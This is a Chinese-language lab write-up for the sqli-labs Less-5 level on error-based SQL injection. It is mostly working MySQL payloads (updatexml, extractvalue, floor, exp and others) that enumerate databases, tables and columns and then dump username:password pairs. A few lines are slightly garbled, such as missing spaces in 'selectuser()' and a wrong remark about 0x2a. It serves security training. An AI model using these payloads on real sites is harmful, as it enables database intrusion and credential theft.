Less-5:报错注入
id=1 页面有回显
第一步:判断注入类型是数字型还是字符型
id=1‘
出现报错为 ''1'' LIMIT 0,1'' ,可判断为字符型且为单引号闭合(报错中 1 被单引号包裹,说明参数是作为字符串拼入查询的)
第二步:判断字段数,使用order by
order by 3时页面正常,order by 4时页面异常,说明有三个字段
updatexml(): select * from test where id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1);
查询当前数据库:
updatexml() 的报错回显只能显示 32 个字符
爆库: updatexml(1,concat(0x2a,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) //爆出所有库名 0,32每次只能爆32为字符,从开始
于是使用 substr 截取字符串后再爆库:
updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),0,32),0x7e),1) //updatexml函数只支持32位长度的报错 floor支持64,但是太长不好记
其他可用于报错注入的函数:
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat((selectuser()),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()select * from test where id=1 and (extractvalue(1,concat(0x7e,(selectuser()),0x7e)));
3.updatexml()select * from test where id=1 and (updatexml(1,concat(0x7e,(selectuser()),0x7e),1));
4.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select *from(select user())a)b));
5.multipoint()select * from test where id=1 and multipoint((select * from(select * from(selectuser())a)b));
6.polygon()select * from test where id=1 and polygon((select * from(select * from(selectuser())a)b));
7.multipolygon()select * from test where id=1 and multipolygon((select * from(select *from(select user())a)b));
8.linestring()select * from test where id=1 and linestring((select * from(select * from(selectuser())a)b));
9.multilinestring()select * from test where id=1 and multilinestring((select * from(select *from(select user())a)b));
10.exp()select * from test where id=1 and exp(~(select * from(select user())a));
使用 substr 函数截取字符串:
updatexml(1,concat(0x2a,substr((select group_concat(schema_name) from information_schema.schemata),1,32),0x7e),1)--+
//拆解如下 concat(0x2a,substr((select group_concat(schema_name) from information_schema.schemata),1,32),0x7e)//前面为0x2a 必须为不可见字符开头 substr((select group_concat(schema_name) from information_schema.schemata),1,32)//从1开始 不是0 (select group_concat(schema_name) from information_schema.schemata)
不断截取,直到输出末尾出现 0x7e(即 ~ 字符)为止,说明内容已取完
逐个列出所有库名:
limit:
updatexml(1,concat(0x7e,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e),1)--+
//拆解如下 concat(0x7e,substr((select schema_name from information_schema.schemata limit 0,1),1,32),0x7e) substr((select schema_name from information_schema.schemata limit 0,1),1,32) (select schema_name from information_schema.schemata limit 0,1)
爆表:
(updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,32),0x7e),1)); -- +
//拆解如下 concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,32),0x7e) substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,32) (select group_concat(table_name) from information_schema.tables where table_schema='security')
爆字段:
(updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,32),0x7e),1)); -- +
//拆解如下 concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,32),0x7e) substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,32) (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security')
爆数据:
updatexml(1,concat(0x2a,substr((select group_concat(username,0x3a,password) from security.users),1,32),0x7e),1);--+
//拆解如下 concat(0x2a,substr((select group_concat(username,0x3a,password) from security.users),1,32),0x7e) substr((select group_concat(username,0x3a,password) from security.users),1,32) (select group_concat(username,0x3a,password) from security.users)